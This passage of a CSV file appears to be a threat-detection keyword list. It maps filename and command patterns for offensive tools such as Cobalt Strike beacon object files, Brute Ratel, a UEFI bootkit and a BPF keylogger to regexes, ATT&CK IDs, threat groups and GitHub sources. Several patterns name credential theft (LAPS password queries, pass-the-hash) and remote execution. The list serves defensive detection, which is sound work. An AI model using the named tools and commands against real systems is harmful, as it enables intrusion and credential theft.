"*BokuLoader.x64*",".{0,1000}BokuLoader\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*bolt://localhost:7687*",".{0,1000}bolt\:\/\/localhost\:7687.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*Bonfee/CVE-2022-0995*",".{0,1000}Bonfee\/CVE\-2022\-0995.{0,1000}","offensive_tool_keyword","POC","CVE-2022-0995 exploit","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/Bonfee/CVE-2022-0995","1","1","N/A","N/A","5","494","70","2022-03-27T09:07:01Z","2022-03-26T21:46:09Z" 
"*BooExecutorImpl.cs*",".{0,1000}BooExecutorImpl\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*book.hacktricks.xyz/*",".{0,1000}book\.hacktricks\.xyz\/.{0,1000}","offensive_tool_keyword","hacktricks.xyz","site often consulted by pentester","T1596 - T1592","TA0043","N/A","N/A","Reconnaissance","https://hacktricks.xyz","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*bootkit-rs.git*",".{0,1000}bootkit\-rs\.git.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" 
"*bootkit-rs-master*",".{0,1000}bootkit\-rs\-master.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*Booty\master_password_list.csv*",".{0,1000}Booty\\master_password_list\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*BorjaMerino*Pazuzu*",".{0,1000}BorjaMerino.{0,1000}Pazuzu.{0,1000}","offensive_tool_keyword","Pazuzu","Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. 
This can be useful in various scenarios.","T1055 - T1027 - T1071 - T1059","TA0002 - TA0005 - TA0011","N/A","N/A","Exploitation tools","https://github.com/BorjaMerino/Pazuzu","1","1","N/A","N/A","3","213","64","2020-08-04T18:49:36Z","2015-10-05T12:23:17Z" "*Bot_MSF_Exp_*.py*",".{0,1000}Bot_MSF_Exp_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Bot_Python_Poc_Log4j2_VMwareHorizon.py*",".{0,1000}Bot_Python_Poc_Log4j2_VMwareHorizon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*bpassthehash*",".{0,1000}bpassthehash.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bpf_keylogger: Log key presses and mouse button events systemwide using eBPF*",".{0,1000}bpf_keylogger\:\sLog\skey\spresses\sand\smouse\sbutton\sevents\ssystemwide\susing\seBPF.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*bpowerpick*",".{0,1000}bpowerpick.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bpsexec_command*",".{0,1000}bpsexec_command.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bpsexec_command*",".{0,1000}bpsexec_command.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced 
adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bpsexec_psh*",".{0,1000}bpsexec_psh.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bpsinject*",".{0,1000}bpsinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bpsinject*",".{0,1000}bpsinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bpysecdump.exe*",".{0,1000}bpysecdump\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*brc4_ldap_sentinel.py*",".{0,1000}brc4_ldap_sentinel\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" 
"*Brc4ConfigExtractor.exe*",".{0,1000}Brc4ConfigExtractor\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brc4DecodeString*",".{0,1000}Brc4DecodeString.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*breg add *HK*",".{0,1000}breg\sadd\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*breg delete *HK*",".{0,1000}breg\sdelete\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*breg query *HK*",".{0,1000}breg\squery\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*breg_add_string_value*",".{0,1000}breg_add_string_value.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*bremote_exec*",".{0,1000}bremote_exec.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*",".{0,1000}breviaries\s\-Properties\sDnsHostName.{0,1000}ms\-Mcs\-AdmPwd.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*brew install sniffer*",".{0,1000}brew\sinstall\ssniffer.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "*bropper.py *",".{0,1000}bropper\.py\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*Bropper-main.zip*",".{0,1000}Bropper\-main\.zip.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*browser.keylog_file.write*",".{0,1000}browser\.keylog_file\.write.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*browser_##*",".{0,1000}browser_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 